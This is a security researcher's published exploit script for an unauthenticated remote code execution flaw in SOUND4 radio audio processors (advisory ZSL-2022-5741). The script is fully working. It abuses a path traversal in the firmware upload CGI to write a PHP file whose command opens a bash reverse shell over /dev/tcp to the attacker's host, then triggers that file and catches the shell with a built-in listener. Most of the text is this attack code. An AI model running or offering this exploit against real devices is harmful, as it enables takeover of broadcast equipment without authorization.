zeroscience
ZSL Bot v4.89.1.00
Python:
#!/usr/bin/env python
#
#
# SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution
#
#
# Vendor: SOUND4 Ltd.
# Product web page: https://www.sound4.com | https://www.sound4.biz
# Affected version: FM/HD Radio Processing:
# Impact/Pulse/First (Version 2: 1.1/2.15)
# Impact/Pulse/First (Version 1: 2.1/1.69)
# Impact/Pulse Eco 1.16
# Voice Processing:
# BigVoice4 1.2
# BigVoice2 1.30
# Web-Audio Streaming:
# Stream 1.1/2.4.29
# Watermarking:
# WM2 (Kantar Media) 1.11
#
# Summary: The SOUND4 IMPACT introduces an innovative process - mono and
# stereo parts of the signal are processed separately to obtain perfect
# consistency in terms of both sound and level. Therefore, in moving
# reception, when the FM receiver switches from stereo to mono and back to
# stereo, the sound variations and changes in level are reduced by over 90%.
# In the SOUND4 IMPACT processing chain, the stereo expander can be used
# substantially without any limitations.
#
# With its advanced functionalities and impressive versatility, SOUND4
# PULSE gives clients the ultimate price - performance ratio, providing
# much more than just a processor. Flexible and powerful, it ensures perfect
# sound quality and full compatibility with radio broadcasting standards
# and can be used simultaneously for FM and HD, DAB, DRM or streaming.
#
# SOUND4 FIRST provides all the most important functionalities you need
# in an FM/HD processor and sets the bar high both in terms of performance
# and affordability. Designed to deliver a sound of uncompromising quality,
# this tool gives you 2-band processing, a digital stereo generator and an
# IMPACT Clipper.
#
# Desc: SOUND4 products suffer from an unauthenticated remote code execution
# vulnerability. An attacker can exploit this vulnerability by abusing the
# firmware upgrade/upload functionality, which contains a path traversal flaw.
# This allows the attacker to arbitrarily write a malicious file to a location
# on the system with www-data permissions, which can be executed to gain unauthorized
# access.
#
# Tested on: Apache/2.4.25 (Unix)
# OpenSSL/1.0.2k
# PHP/7.1.1
# GNU/Linux 5.10.43 (armv7l)
# GNU/Linux 4.9.228 (armv7l)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2022-5741
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5741.php
#
#
# 26.09.2022
#
#
from time import sleep
import threading#-----
import telnetlib#-----
import requests#------
import socket#--------
import sys#-----------
import re#------------
class VideoKilledTheRadioStar:
def __init__(self):
self.secretagent = "Dj/Ole"
self.payload = None
self.deploy = None
self.rhost = None
self.lhost = None
self.lport = None
def the_args(self):
if len(sys.argv) != 4:
self.the_usage()
else:
self.rhost = sys.argv[1]
self.lhost = sys.argv[2]
self.lport = int(sys.argv[3])
if not "http" in self.rhost:
self.rhost = "http://{}".format(self.rhost)
def the_usage(self):
self.the_wha()
print("Usage: python {} [targetIP:targetPORT] [listenIP] [listenPORT]".format(sys.argv[0]))
exit(0)
def the_wha(self):
titl = """
/\______ __
/-~ ,^~ / __n
/ ,---x /_.-"L/__,\\
/-".---.\_.-'/!" \ \\
0\/0___/ x' / ) |
\.______.-'_.{__.-"_.^
`x____,.-",-~( .-"
_.-| ,^.-~ "\\
__.-~_,-|/\/ `i
/ u.-~ .-{\/ .-^--.
\/ v~ ,-^x.____}--r |
/ /" | |
_/_/ !_l_
o~_//) (_\\_~o
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
print(titl)
def the_upload(self):
print("Writing callback file...")
self.headers = {"Content-Type" : "multipart/form-data; boundary=----TheMenu",
"Accept-Language" : "en-US,en;q=0.9",
"Accept-Encoding" : "gzip, deflate",
"User-Agent" : self.secretagent,
"Cache-Control" : "max-age=0",
"Connection" : "close",
"Accept" : "*/*"}
self.payload = "<?php exec(\"/bin/bash -c 'bash -i > /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm b.php'\");"
self.deploy = "------TheMenu\r\nContent-Disposition: form-data;"#us
self.deploy += " name=\"upgfile\"; filename=\"../../../../../../"#Me
self.deploy += "../var/www/b.php\"\r\nContent-Type: application/"#co
self.deploy += "octet-stream\r\n\r\n"+self.payload+"\r\n------Th"#..
self.deploy += "eMenu\r\nContent-Disposition: form-data; name=\""#n
self.deploy += "submit\"\r\n\r\nDo it\r\n------TheMenu--\r\n"#------
requests.post(self.rhost+"/cgi-bin/upload.cgi", headers=self.headers, data=self.deploy)
sleep(1)
requests.get(self.rhost+"/b.php")
def the_subp(self):
konac = threading.Thread(name="ZSL", target=self.the_ear)
konac.start()
sleep(1)
self.the_upload()
def the_ear(self):
telnetus = telnetlib.Telnet()
print("Starting handler on port {}.".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(7)
s.listen(1)
conn, addr = s.accept()
print("Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("Hmmm ({msg})".format(msg=p))
s.close()
exit(0)
break
print("You got shell.")
telnetus.interact()
conn.close()
def main(self):
self.the_args()
self.the_subp()
if __name__ == '__main__':
VideoKilledTheRadioStar().main()
Zero Science Lab » SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (upload.cgi) Unauthenticated Remote Code Execution
Македонска лабораторија за истражување и развој на информациска безбедност
www.zeroscience.mk